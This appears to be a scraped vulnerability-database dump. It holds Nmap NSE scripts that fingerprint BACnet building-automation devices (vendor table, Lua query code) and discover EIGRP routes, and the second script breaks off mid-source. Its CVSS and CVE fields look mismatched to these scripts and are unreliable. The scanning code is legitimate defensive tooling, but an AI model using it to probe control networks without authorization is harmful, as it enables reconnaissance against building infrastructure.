= \"Nextek Power Systems\",\n [812] = \"Creative Lighting\",\n [813] = \"WaterFurnace International\",\n [814] = \"Mercury Security\",\n [815] = \"Hisense (Shandong) Air-Conditioning Co.\",\n [816] = \"Layered Solutions\",\n [817] = \"Leegood Automatic System\",\n [818] = \"Shanghai Restar Technology Co.\",\n [819] = \"Reimann Ingenieurburo\",\n [820] = \"LynTec\",\n [821] = \"HTP\",\n [822] = \"Elkor Technologies\",\n [823] = \"Bentrol Pty Ltd\",\n [824] = \"Team-Control Oy\",\n [825] = \"NextDevice\",\n [826] = \"GLOBAL CONTROL 5 Sp. z o.o.\",\n [827] = \"King I Electronics Co.\",\n [828] = \"SAMDAV\",\n [829] = \"Next Gen Industries Pvt. Ltd.\",\n [830] = \"Entic LLC\",\n [831] = \"ETAP\",\n [832] = \"Moralle Electronics Limited\",\n [833] = \"Leicom AG\",\n [834] = \"Watts Regulator Company\",\n [835] = \"S.C. Orbtronics S.R.L.\",\n [836] = \"Gaussan Technologies\",\n [837] = \"WEBfactory GmbH\",\n [838] = \"Ocean Controls\",\n [839] = \"Messana Air-Ray Conditioning s.r.l.\",\n [840] = \"Hangzhou BATOWN Technology Co. Ltd.\",\n [841] = \"Reasonable Controls\",\n [842] = \"Servisys\",\n [843] = \"halstrup-walcher GmbH\",\n [844] = \"SWG Automation Fuzhou Limited\",\n [845] = \"KSB Aktiengesellschaft\",\n [846] = \"Hybryd Sp. z o.o.\",\n [847] = \"Helvatron AG\",\n [848] = \"Oderon Sp. Z.O.O.\",\n [849] = \"miko\",\n [850] = \"Exodraft\",\n [851] = \"Hochhuth GmbH\",\n [852] = \"Integrated System Technologies Ltd.\",\n [853] = \"Shanghai Cellcons Controls Co., Ltd\",\n [854] = \"Emme Controls, LLC\",\n [855] = \"Field Diagnostic Services, Inc.\",\n [856] = \"Ges Teknik A.S.\",\n [857] = \"Global Power Products, Inc.\",\n [858] = \"Option NV\",\n [859] = \"BV-Control AG\",\n [860] = \"Sigren Engineering AG\",\n [861] = \"Shanghai Jaltone Technology Co., Ltd.\",\n [862] = \"MaxLine Solutions Ltd\",\n [863] = \"Kron Instrumentos El\u00e9tricos Ltda\",\n [864] = \"Thermo Matrix\",\n [865] = \"Infinite Automation Systems, Inc.\",\n [866] = \"Vantage\",\n [867] = \"Elecon Measurements Pvt Ltd\",\n [868] = \"TBA\",\n [869] = \"Carnes Company\",\n [870] = \"Harman Professional\",\n [871] = \"Nenutec Asia Pacific Pte Ltd\",\n [872] = \"Gia NV\",\n [873] = \"Kepware Tehnologies\",\n [874] = \"Temperature Electronics Ltd\",\n [875] = \"Packet Power\",\n [876] = \"Project Haystack Corporation\",\n [877] = \"DEOS Controls Americas Inc.\",\n [878] = \"Senseware Inc\",\n [879] = \"MST Systemtechnik AG\",\n [880] = \"Lonix Ltd\",\n [881] = \"GMC-I Messtechnik GmbH\",\n [882] = \"Aviosys International Inc.\",\n [883] = \"Efficient Building Automation Corp.\",\n [884] = \"Accutron Instruments Inc.\",\n [885] = \"Vermont Energy Control Systems LLC\",\n [886] = \"DCC Dynamics\",\n [887] = \"B.E.G. Br\u00fcck Electronic GmbH\",\n [889] = \"NGBS Hungary Ltd.\",\n [890] = \"ILLUM Technology, LLC\",\n [891] = \"Delta Controls Germany Limited\",\n [892] = \"S+T Service & Technique S.A.\",\n [893] = \"SimpleSoft\",\n [894] = \"Altair Engineering\",\n [895] = \"EZEN Solution Inc.\",\n [896] = \"Fujitec Co. Ltd.\",\n [897] = \"Terralux\",\n [898] = \"Annicom\",\n [899] = \"Bihl+Wiedemann GmbH\",\n [900] = \"Draper, Inc.\",\n [901] = \"Sch\u00fcco International KG\",\n [902] = \"Otis Elevator Company\",\n [903] = \"Fidelix Oy\",\n [904] = \"RAM GmbH Mess- und Regeltechnik\",\n [905] = \"WEMS\",\n [906] = \"Ravel Electronics Pvt Ltd\",\n [907] = \"OmniMagni\",\n [908] = \"Echelon\",\n [909] = \"Intellimeter Canada, Inc.\",\n [910] = \"Bithouse Oy\",\n [912] = \"BuildPulse\",\n [913] = \"Shenzhen 1000 Building Automation Co. Ltd\",\n [914] = \"AED Engineering GmbH\",\n [915] = \"G\u00fcntner GmbH & Co. KG\",\n [916] = \"KNXlogic\",\n [917] = \"CIM Environmental Group\",\n [918] = \"Flow Control\",\n [919] = \"Lumen Cache, Inc.\",\n [920] = \"Ecosystem\",\n [921] = \"Potter Electric Signal Company, LLC\",\n [922] = \"Tyco Fire & Security S.p.A.\",\n [923] = \"Watanabe Electric Industry Co., Ltd.\",\n [924] = \"Causam Energy\",\n [925] = \"W-tec AG\",\n [926] = \"IMI Hydronic Engineering International SA\",\n [927] = \"ARIGO Software\",\n [928] = \"MSA Safety\",\n [929] = \"Smart Solucoes Ltda - MERCATO\",\n [930] = \"PIATRA Engineering\",\n [931] = \"ODIN Automation Systems, LLC\",\n [932] = \"Belparts NV\",\n [933] = \"UAB, SALDA\",\n [934] = \"Alre-IT Regeltechnik GmbH\",\n [935] = \"Ingenieurb\u00fcro H. Lertes GmbH & Co. KG\",\n [936] = \"Breathing Buildings\",\n [937] = \"eWON SA\",\n [938] = \"Cav. Uff. Giacomo Cimberio S.p.A\",\n [939] = \"PKE Electronics AG\",\n [940] = \"Allen\",\n [941] = \"Kastle Systems\",\n [942] = \"Logical Electro-Mechanical (EM) Systems, Inc.\",\n [943] = \"ppKinetics Instruments, LLC\",\n [944] = \"Cathexis Technologies\",\n [945] = \"Sylop sp. Z o.o. sp.k\",\n [946] = \"Brauns Control GmbH\",\n [947] = \"Omron Corporation\",\n [948] = \"Wildeboer Bauteile Gmbh\",\n [949] = \"Shanghai Biens Technologies Ltd\",\n [950] = \"Beijing HZHY Technology Co., Ltd\",\n [951] = \"Building Clouds\",\n [952] = \"The University of Sheffield-Department of Electronic and Electrical Engineering\",\n [953] = \"Fabtronics Australia Pty Ltd\",\n [954] = \"SLAT\",\n [955] = \"Software Motor Corporation\",\n [956] = \"Armstrong International Inc.\",\n [957] = \"Steril-Aire, Inc.\",\n [958] = \"Infinique\",\n [959] = \"Arcom\",\n [960] = \"Argo Performance, Ltd\",\n [961] = \"Dialight\",\n [962] = \"Ideal Technical Solutions\",\n [963] = \"Neurobat AG\",\n [964] = \"Neyer Software Consulting LLC\",\n [965] = \"SCADA Technology Development Co., Ltd.\",\n [966] = \"Demand Logic Limited\",\n [967] = \"GWA Group Limited\",\n [968] = \"Occitaline\",\n [969] = \"NAO Digital Co., Ltd.\",\n [970] = \"Shenzhen Chanslink Network Technology Co., Ltd.\",\n [971] = \"Samsung Electronics Co., Ltd.\",\n [972] = \"Mesa Laboratories, Inc.\",\n [973] = \"Fischer\",\n [974] = \"OpSys Solutions Ltd.\",\n [975] = \"Advanced Devices Limited\",\n [976] = \"Condair\",\n [977] = \"INELCOM Ingenieria Electronica Comercial S.A.\",\n [978] = \"GridPoint, Inc.\",\n [979] = \"ADF Technologies Sdn Bhd\",\n [980] = \"EPM, Inc.\",\n [981] = \"Lighting Controls Ltd\",\n [982] = \"Perix Controls Ltd.\",\n [983] = \"AERCO International, Inc.\",\n [984] = \"KONE Inc.\",\n [985] = \"Ziehl-Abegg SE\",\n [986] = \"Robot, S.A.\",\n [987] = \"Optigo Networks, Inc.\",\n [988] = \"Openmotics BVBA\",\n [989] = \"Metropolitan Industries, Inc.\",\n [990] = \"Huawei Technologies Co., Ltd.\",\n [991] = \"OSRAM Sylvania, Inc.\",\n [992] = \"Vanti\",\n [993] = \"Cree Lighting\",\n [994] = \"Richmond Heights SDN BHD\",\n [995] = \"Payne-Sparkman Lighting Mangement\",\n [996] = \"Ashcroft\",\n [997] = \"Jet Controls Corp\",\n [998] = \"Zumtobel Lighting GmbH\",\n [1000] = \"Ekon GmbH\",\n [1001] = \"Molex\",\n [1002] = \"Maco Lighting Pty Ltd.\",\n [1003] = \"Axecon Corp.\",\n [1004] = \"Tensor plc\",\n [1005] = \"Kaseman Environmental Control Equipment (Shanghai) Limited\",\n [1006] = \"AB Axis Industries\",\n [1007] = \"Netix Controls\",\n [1008] = \"Eldridge Products, Inc.\",\n [1009] = \"Micronics\",\n [1010] = \"Fortecho Solutions Ltd\",\n [1011] = \"Sellers Manufacturing Company\",\n [1012] = \"Rite-Hite Doors, Inc.\",\n [1013] = \"Violet Defense LLC\",\n [1014] = \"Simna\",\n [1015] = \"Multi-\u00c9nergie Best Inc.\",\n [1016] = \"Mega System Technologies, Inc.\",\n [1017] = \"Rheem\",\n [1018] = \"Ing. Punzenberger COPA-DATA GmbH\",\n [1019] = \"MEC Electronics GmbH\",\n [1020] = \"Taco Comfort Solutions\",\n [1021] = \"Alexander Maier GmbH\",\n [1022] = \"Ecorithm, Inc.\",\n [1023] = \"Accurro Ltd\",\n [1024] = \"ROMTECK Australia Pty Ltd\",\n [1025] = \"Splash Monitoring Limited\",\n [1026] = \"Light Application\",\n [1027] = \"Logical Building Automation\",\n [1028] = \"Exilight Oy\",\n [1029] = \"Hager Electro SAS\",\n [1030] = \"KLIF Co., LTD\",\n [1031] = \"HygroMatik\",\n [1032] = \"Daniel Mousseau Programmation & Electronique\",\n [1033] = \"Aerionics Inc.\",\n [1034] = \"M2S Electronique Ltee\",\n [1035] = \"Automation Components, Inc.\",\n [1036] = \"Niobrara Research & Development Corporation\",\n [1037] = \"Netcom Sicherheitstechnik GmbH\",\n [1038] = \"Lumel S.A.\",\n [1039] = \"Great Plains Industries, Inc.\",\n [1040] = \"Domotica Labs S.R.L\",\n [1041] = \"Energy Cloud, Inc.\",\n [1042] = \"Vomatec\",\n [1043] = \"Demma Companies\",\n [1044] = \"Valsena\",\n [1045] = \"Comsys B\u00e4rtsch AG\",\n [1046] = \"bGrid\",\n [1047] = \"MDJ Software Pty Ltd\",\n [1048] = \"Dimonoff, Inc.\",\n [1049] = \"Edomo Systems, GmbH\",\n [1050] = \"Effektiv, LLC\",\n [1051] = \"SteamOVap\",\n [1052] = \"grandcentrix GmbH\",\n [1053] = \"Weintek Labs, Inc.\",\n [1054] = \"Intefox GmbH\",\n [1055] = \"Radius22 Automation Company\",\n [1056] = \"Ringdale, Inc.\",\n [1057] = \"Iwaki America\",\n [1058] = \"Bractlet\",\n [1059] = \"STULZ Air Technology Systems, Inc.\",\n [1060] = \"Climate Ready Engineering Pty Ltd\",\n [1061] = \"Genea Energy Partners\",\n [1062] = \"IoTall Chile\",\n [1063] = \"IKS Co., Ltd.\",\n [1064] = \"Yodiwo AB\",\n [1065] = \"TITAN electronic GmbH\",\n [1066] = \"IDEC Corporation\",\n [1067] = \"SIFRI SL\",\n [1068] = \"Thermal Gas Systems Inc.\",\n [1069] = \"Building Automation Products, Inc.\",\n [1070] = \"Asset Mapping\",\n [1071] = \"Smarteh Company\",\n [1072] = \"Datapod Australia Pty Ltd.\",\n [1073] = \"Buildings Alive Pty Ltd\",\n [1074] = \"Digital Elektronik\",\n [1075] = \"Talent Automa\u00e7\u00e3o e Tecnologia Ltda\",\n [1076] = \"Norposh Limited\",\n [1077] = \"Merkur Funksysteme AG\",\n [1078] = \"Faster CZ spol. S.r.o\",\n [1079] = \"Eco-Adapt\",\n [1080] = \"Energocentrum Plus, s.r.o\",\n [1081] = \"amBX UK Ltd\",\n [1082] = \"Western Reserve Controls, Inc.\",\n [1083] = \"LayerZero Power Systems, Inc.\",\n [1084] = \"CIC Jan H\u0159ebec s.r.o.\",\n [1085] = \"Sigrov BV\",\n [1086] = \"ISYS-Intelligent Systems\",\n [1087] = \"Gas Detection (Australia) Pty Ltd\",\n [1088] = \"Kinco Automation (Shanghai) Ltd.\",\n [1089] = \"Lars Energy, LLC\",\n [1090] = \"Flamefast (UK) Ltd.\",\n [1091] = \"Royal Service Air Conditioning\",\n [1092] = \"Ampio Sp. Z o.o.\",\n [1093] = \"Inovonics Wireless Corporation\",\n [1094] = \"Nvent Thermal Management\",\n [1095] = \"Sinowell Control System Ltd\",\n [1096] = \"Moxa Inc.\",\n [1097] = \"Matrix iControl SDN BHD\",\n [1098] = \"PurpleSwift\",\n [1099] = \"OTIM Technologies\",\n [1100] = \"FlowMate Limited\",\n [1101] = \"Degree Controls, Inc.\",\n [1102] = \"Fei Xing (Shanghai) Software Technologies Co., Ltd.\",\n [1103] = \"Berg GmbH\",\n [1104] = \"ARENZ.IT\",\n [1105] = \"Edelstrom Electronic Devices & Designing LLC\",\n [1106] = \"Drive Connect, LLC\",\n [1107] = \"DevelopNow\",\n [1108] = \"Poort\",\n [1109] = \"VMEIL Information (Shanghai) Ltd\",\n [1110] = \"Rayleigh Instruments\",\n [1112] = \"CODESYS Development\",\n [1113] = \"Smartware Technologies Group, LLC\",\n [1114] = \"Polar Bear Solutions\",\n [1115] = \"Codra\",\n [1116] = \"Pharos Architectural Controls Ltd\",\n [1117] = \"EngiNear Ltd.\",\n [1118] = \"Ad Hoc Electronics\",\n [1119] = \"Unified Microsystems\",\n [1120] = \"Industrieelektronik Brandenburg GmbH\",\n [1121] = \"Hartmann GmbH\",\n [1122] = \"Piscada\",\n [1123] = \"KMB systems, s.r.o.\",\n [1124] = \"PowerTech Engineering AS\",\n [1125] = \"Telefonbau Arthur Schwabe GmbH & Co. KG\",\n [1126] = \"Wuxi Fistwelove Technology Co., Ltd.\",\n [1127] = \"Prysm\",\n [1128] = \"STEINEL GmbH\",\n [1129] = \"Georg Fischer JRG AG\",\n [1130] = \"Make Develop SL\",\n [1131] = \"Monnit Corporation\",\n [1132] = \"Mirror Life Corporation\",\n [1133] = \"Secure Meters Limited\",\n [1134] = \"PECO\",\n [1135] = \".CCTECH, Inc.\",\n [1136] = \"LightFi Limited\",\n [1137] = \"Nice Spa\",\n [1138] = \"Fiber SenSys, Inc.\",\n [1139] = \"B&D Buchta und Degeorgi\",\n [1140] = \"Ventacity Systems, Inc.\",\n [1141] = \"Hitachi-Johnson Controls Air Conditioning, Inc.\",\n [1142] = \"Sage Metering, Inc.\",\n [1143] = \"Andel Limited\",\n [1144] = \"ECOSmart Technologies\",\n [1145] = \"S.E.T.\",\n [1146] = \"Protec Fire Detection Spain SL\",\n [1147] = \"AGRAMER UG\",\n [1148] = \"Anylink Electronic GmbH\",\n [1149] = \"Schindler, Ltd\",\n [1150] = \"Jibreel Abdeen Est.\",\n [1151] = \"Fluidyne Control Systems Pvt. Ltd\",\n [1152] = \"Prism Systems, Inc.\",\n [1153] = \"Enertiv\",\n [1154] = \"Mirasoft GmbH & Co. KG\",\n [1155] = \"DUALTECH IT\",\n [1156] = \"Countlogic, LLC\",\n [1157] = \"Kohler\",\n [1158] = \"Chen Sen Controls Co., Ltd.\",\n [1159] = \"Greenheck\",\n [1160] = \"Intwine Connect, LLC\",\n [1161] = \"Karlborgs Elkontroll\",\n [1162] = \"Datakom\",\n [1163] = \"Hoga Control AS\",\n [1164] = \"Cool Automation\",\n [1165] = \"Inter Search Co., Ltd\",\n [1166] = \"DABBEL-Automation Intelligence GmbH\",\n [1167] = \"Gadgeon Engineering Smartness\",\n [1168] = \"Coster Group S.r.l.\",\n [1169] = \"Walter M\u00fcller AG\",\n [1170] = \"Fluke\",\n [1171] = \"Quintex Systems Ltd\",\n [1172] = \"Senfficient SDN BHD\",\n [1173] = \"Nube iO Operations Pty Ltd\",\n [1174] = \"DAS Integrator Pte Ltd\",\n [1175] = \"CREVIS Co., Ltd\",\n [1176] = \"iSquared software inc.\",\n [1177] = \"KTG GmbH\",\n [1178] = \"POK Group Oy\",\n [1179] = \"Adiscom\",\n [1180] = \"Incusense\",\n [1181] = \"75F\",\n [1182] = \"Anord Mardix, Inc.\",\n [1183] = \"HOSCH Geb\u00e4udeautomation Neue Produkte GmbH\",\n [1184] = \"BOSCH Software Innovations GmbH\",\n [1185] = \"Royal Boon Edam International B.V.\",\n [1186] = \"Clack Corporation\",\n [1187] = \"Unitex Controls LLC\",\n [1188] = \"KTC G\u00f6teborg AB\",\n [1189] = \"Interzon AB\",\n [1190] = \"ISDE ING SL\",\n [1191] = \"ABM automation building messaging GmbH\",\n [1192] = \"Kentec Electronics Ltd\",\n [1193] = \"Emerson Commercial and Residential Solutions\",\n [1194] = \"Powerside\",\n [1195] = \"SMC Group\",\n [1196] = \"EOS Weather Instruments\",\n [1197] = \"Zonex Systems\",\n [1198] = \"Generex Systems Computervertriebsgesellschaft mbH\",\n [1199] = \"Energy Wall LLC\",\n [1200] = \"Thermofin\",\n [1201] = \"SDATAWAY SA\",\n [1202] = \"Biddle Air Systems Limited\",\n [1203] = \"Kessler Ellis Products\",\n [1204] = \"Thermoscreens\",\n [1205] = \"Modio\",\n [1206] = \"Newron Solutions\",\n [1207] = \"Unitronics\",\n [1208] = \"TRILUX GmbH & Co. KG\",\n [1209] = \"Kollmorgen Steuerungstechnik GmbH\",\n [1210] = \"Bosch Rexroth AG\",\n [1211] = \"Alarko Carrier\",\n [1212] = \"Verdigris Technologies\"\n}\n--return vendor information\nfunction vendor_lookup(vennum)\n local vendorname = vendor_id[vennum] or \"Unknown Vendor Number\"\n return string.format(\"%s (%d)\", vendorname, vennum)\nend\n\n---\n-- Function to lookup the length of the Field to be used for Vendor ID, Firmware\n-- Object Name, Software Version, and Location. It will then return the Value\n-- that is stored inside the packet for this information as a String Value.\n-- The field is located in the 18th byte of the data field of a valid packet.\n-- Depending on this field the information will be stored in field 20 + length\n-- or in field 22 + length.\n--\n-- @param packet The packet that was received and is ready to be parsed\nfunction field_size(packet)\n -- read the Length field from the packet data byte 18\n local offset\n -- Verify the field from byte 18 to determine if the vendor number is one byte or two bytes?\n local value = string.byte(packet, 18)\n if ( value % 0x10 < 5 ) then\n value = value % 0x10 - 1\n offset = 19\n else\n value = string.byte(packet, 19) - 1\n offset = 20\n end\n -- unpack a string of length <value>\n local charset, info\n charset, info, offset = string.unpack(\"Bc\" .. tostring(value), packet, offset)\n -- return information that was found in the packet\n if charset == 0 then -- UTF-8\n return info\n elseif charset == 4 then -- UCS-2 big-endian\n return unicode.transcode(info, unicode.utf16_dec, unicode.utf8_enc, true, nil)\n else -- TODO: other encodings not supported by unicode.lua\n return info\n end\nend\n\n---\n-- Function to set the nmap output for the host, if a valid BACNet packet\n-- is received then the output will show that the port is open instead of\n-- <code>open|filtered</code>\n--\n-- @param host Host that was passed in via nmap\n-- @param port port that BACNet is running on (Default UDP/47808)\nfunction set_nmap(host, port)\n\n --set port Open\n port.state = \"open\"\n -- set version name to BACNet\n port.version.name = \"bacnet\"\n nmap.set_port_version(host, port)\n nmap.set_port_state(host, port, \"open\")\n\nend\n\n--- Sends a query for Property Identifier id (a number) on socket\nlocal function send_query(socket, id)\n -- Wireshark dissection:\n local query = string.pack(\">BB I2 BBBBBBB I4 BB\",\n 0x81, -- Type: BACnet/IP (Annex J)\n 0x0a, -- Function: Original-Unicast-NPDU\n 0x0011, -- BVLC-Length: 4 of 17 bytes\n -- BACnet NPDU\n 0x01, -- Version: 0x01 (ASHRAE 135-1995)\n 0x04, -- Control (expecting reply)\n -- BACnet APDU\n 0x00, -- APDU Type: Confirmed-REQ, PDU flags: 0x0\n 0x05, -- Max response segments unspecified, Max APDU size: 1476 octets\n 0x01, -- Invoke ID: 1\n 0x0c, -- Service Choice: readProperty\n 0x0c, -- Context-specific tag, number 0, Length Value Type 4\n 0x023fffff, -- Object Type: device; instance number 4194303\n 0x19, -- Context-specific tag, number 1, Length Value Type 1\n id)\n return socket:send(query)\nend\n\nlocal query_codes = {\n firmware = 0x2c,\n application = 0x0c,\n model = 0x46,\n object = 0x4d,\n object_id = 0x4b,\n description = 0x1c,\n location = 0x3a,\n vendor = 0x79,\n vendor_id = 0x78\n}\n---\n-- Function to send a query to the discovered BACNet devices. This will pull extra\n-- information to help identify the device. Information such as firmware, application software\n-- object name, description, and location parameters configured inside of the device.\n--\n-- @param socket The socket that was created in the action function\n-- @param type Type is the type of packet to send, this can be firmware, application, object, description, or location\nfunction standard_query(socket, type)\n\n -- determine what type of packet to send\n local query = query_codes[type]\n assert(query) -- table lookup must not fail.\n\n --try to pull the information\n local status, result = send_query(socket, query)\n if(status == false) then\n stdnse.debug1(\"Socket error sending query: %s\", result)\n return nil\n end\n -- receive packet from response\n local rcvstatus, response = socket:receive()\n if(rcvstatus == false) then\n stdnse.debug1(\"Socket error receiving: %s\", response)\n return nil\n end\n -- validate valid BACNet Packet\n if( string.byte(response, 1) == 0x81 ) then\n -- Lookup byte 7 (packet type)\n local value = string.byte(response, 7)\n -- verify that the response packet was not an error packet\n if( value ~= 0x50) then\n --collect information by looping thru the packet\n return field_size(response)\n -- if it was an error packet, set the string to error for later purposes\n else\n stdnse.debug1(\"Error receiving: BACNet Error\")\n return nil\n end\n -- else ERROR\n else\n stdnse.debug1(\"Error receiving Vendor ID: Invalid BACNet packet\")\n return nil\n end\n\nend\n---\n-- Function to send a query to the discovered BACNet devices. This function queries extra\n-- information to help identify the device. Vendor ID query is sent with this\n-- function and the Vendor ID number is parsed out of the packet.\n--\n-- @param socket The socket that was created in the action function\nfunction vendornum_query(socket)\n\n -- set the vendor query data for sending\n local vendor_query = query_codes.vendor_id\n assert(vendor_query)\n\n --send the vendor information\n local status, result = send_query(socket, vendor_query)\n if(status == false) then\n stdnse.debug1(\"Socket error sending vendor query: %s\", result)\n return nil\n end\n -- receive vendor information packet\n local rcvstatus, response = socket:receive()\n if(rcvstatus == false) then\n stdnse.debug1(\"Socket error receiving vendor query: %s\", response)\n return nil\n end\n -- validate valid BACNet Packet\n if( string.byte(response, 1) == 0x81 ) then\n local value = string.byte(response, 7)\n --if the vendor query resulted in an error\n if( value ~= 0x50) then\n -- read values for byte 18 in the packet data\n -- this value determines if vendor number is 1 or 2 bytes\n value = string.byte(response, 18)\n else\n stdnse.debug1(\"Error receiving Vendor ID: BACNet Error\")\n return nil\n end\n -- if value is 21 (byte 18)\n if( value == 0x21 ) then\n -- convert hex to decimal\n local vendornum = string.byte(response, 19)\n -- look up vendor name from table\n return vendor_lookup(vendornum)\n -- if value is 22 (byte 18)\n elseif( value == 0x22 ) then\n -- convert hex to decimal\n local vendornum = string.unpack(\">I2\", response, 19)\n -- look up vendor name from table\n return vendor_lookup(vendornum)\n else\n -- set return value to an Error if byte 18 was not 21/22\n stdnse.debug1(\"Error receiving Vendor ID: Invalid BACNet packet\")\n return nil\n end\n end\n\nend\n\n---\n-- Action Function that is used to run the NSE. This function will send the initial query to the\n-- host and port that were passed in via nmap. The initial response is parsed to determine if host\n-- is a BACNet device. If it is then more actions are taken to gather extra information.\n--\n-- @param host Host that was scanned via nmap\n-- @param port port that was scanned via nmap\naction = function(host, port)\n --set the first query data for sending\n local orig_query = query_codes.object_id\n assert(orig_query)\n local to_return = nil\n\n -- create new socket\n local sock = nmap.new_socket()\n -- Bind to port for niceness with BACNet this may need to be commented out if\n -- scanning more than one host at a time, may fix some issues seen on Windows\n --\n local status, err = sock:bind(nil, port.number)\n if(status == false) then\n stdnse.debug1(\"Couldn't bind to %s/udp. Continuing anyway, results may vary\", port.number)\n end\n -- connect to the remote host\n local constatus, conerr = sock:connect(host, port)\n if not constatus then\n stdnse.debug1('Error establishing a UDP connection for %s - %s', host, conerr)\n return nil\n end\n -- send the original query to see if it is a valid BACNet Device\n local sendstatus, senderr = send_query(sock, orig_query)\n if not sendstatus then\n stdnse.debug1('Error sending BACNet request to %s:%d - %s', host.ip, port.number, senderr)\n return nil\n end\n\n -- receive response\n local rcvstatus, response = sock:receive()\n if(rcvstatus == false) then\n stdnse.debug1(\"Receive error: %s\", response)\n return nil\n end\n\n -- if the response starts with 0x81 then its BACNet\n if( string.byte(response, 1) == 0x81 ) then\n local value = string.byte(response, 7)\n --if the first query resulted in an error\n --\n if( value == 0x50) then\n -- set the nmap output for the port and version\n set_nmap(host, port)\n -- return that BACNet Error was received\n to_return = \"\\nBACNet ADPU Type: Error (5) \\n\\t\" .. stdnse.tohex(response)\n --else pull the InstanceNumber and move onto the pulling more information\n --\n else\n to_return = stdnse.output_table()\n -- set the nmap output for the port and version\n set_nmap(host, port)\n\n -- Vendor Number to Name lookup\n to_return[\"Vendor ID\"] = vendornum_query(sock)\n\n -- vendor name\n to_return[\"Vendor Name\"] = standard_query(sock, \"vendor\")\n\n -- Instance Number (object number)\n local instance = string.unpack(\">I3\", response, 20)\n to_return[\"Object-identifier\"] = instance\n\n --Firmware Verson\n to_return[\"Firmware\"] = standard_query(sock, \"firmware\")\n\n -- Application Software Version\n to_return[\"Application Software\"] = standard_query(sock, \"application\")\n\n -- Object Name\n to_return[\"Object Name\"] = standard_query(sock, \"object\")\n\n -- Model Name\n to_return[\"Model Name\"] = standard_query(sock, \"model\")\n\n -- Description\n to_return[\"Description\"] = standard_query(sock, \"description\")\n\n -- Location\n to_return[\"Location\"] = standard_query(sock, \"location\")\n\n end\n else\n -- return nothing, no BACNet was detected\n -- close socket\n sock:close()\n return nil\n end\n -- close socket\n sock:close()\n -- return all information that was found\n return to_return\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:04", "description": "Performs network discovery and routing information gathering through Cisco's Enhanced Interior Gateway Routing Protocol (EIGRP). \n\nThe script works by sending an EIGRP Hello packet with the specified Autonomous System value to the 224.0.0.10 multicast address and listening for EIGRP Update packets. The script then parses the update responses for routing information. \n\nIf no A.S value was provided by the user, the script will listen for multicast Hello packets to grab an A.S value. If no interface was provided as a script argument or through the -e option, the script will send packets and listen through all valid ethernet interfaces simultaneously.\n\n## Script Arguments \n\n#### broadcast-eigrp-discovery.kparams \n\nthe K metrics. Defaults to `101000`.\n\n#### broadcast-eigrp-discovery.as \n\nAutonomous System value to announce on. If not set, the script will listen for announcements on 224.0.0.10 to grab an A.S value.\n\n#### broadcast-eigrp-discovery.interface \n\nInterface to send on (overrides -e)\n\n#### broadcast-eigrp-discovery.timeout \n\nMax amount of time to listen for A.S announcements and updates. Defaults to `10` seconds.\n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=broadcast-eigrp-discovery <targets>\n nmap --script=broadcast-eigrp-discovery <targets> -e wlan0\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-eigrp-discovery:\n | 192.168.2.2\n | Interface: eth0\n | A.S: 1\n | Virtual Router ID: 0\n | Internal Route\n | Destination: 192.168.21.0/24\n | Next hop: 0.0.0.0\n | Internal Route\n | Destination: 192.168.31.0/24\n | Next hop: 0.0.0.0\n | External Route\n | Protocol: Static\n | Originating A.S: 0\n | Originating Router ID: 192.168.31.1\n | Destination: 192.168.60.0/24\n | Next hop: 0.0.0.0\n | External Route\n | Protocol: OSPF\n | Originating A.S: 1\n | Originating Router ID: 192.168.31.1\n | Destination: 192.168.24.0/24\n | Next hop: 0.0.0.0\n |_ Use the newtargets script-arg to add the results as targets\n \n\n## Requires \n\n * [eigrp](<../lib/eigrp.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [packet](<../lib/packet.html>)\n * [ipOps](<../lib/ipOps.html>)\n * [target](<../lib/target.html>)\n * [coroutine](<>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-08-15T01:50:47", "type": "nmap", "title": "broadcast-eigrp-discovery NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-08-29T03:06:40", "id": "NMAP:BROADCAST-EIGRP-DISCOVERY.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-eigrp-discovery.html", "sourceData": "local eigrp = require \"eigrp\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal packet = require \"packet\"\nlocal ipOps = require \"ipOps\"\nlocal target = require \"target\"\nlocal coroutine = require \"coroutine\"\nlocal string = require \"string\"\n\ndescription = [[\nPerforms network discovery and routing information gathering through\nCisco's Enhanced Interior Gateway Routing Protocol (EIGRP).\n\nThe script works by sending an EIGRP Hello packet with the specified Autonomous\nSystem value to the 224.0.0.10 multicast address and listening for EIGRP Update\npackets. The script then parses the update responses for routing information.\n\nIf no A.S value was provided by the user, the script will listen for multicast\nHello packets to grab an A.S value. If no interface was provided as a script\nargument or through the -e option, the script will send packets and listen\nthrough all valid ethernet interfaces simultaneously.\n\n]]\n\n---\n-- @usage\n-- nmap --script=broadcast-eigrp-discovery <targets>\n-- nmap --script=broadcast-eigrp-discovery <targets> -e wlan0\n--\n-- @args broadcast-eigrp-discovery.as Autonomous System value to announce on.\n-- If not set, the script will listen for announcements on 224.0.0.10 to grab\n-- an A.S value.\n--\n-- @args broadcast-eigrp-discovery.timeout Max amount of time to listen for A.S\n-- announcements and updates. Defaults to <code>10</code> seconds.\n--\n-- @args 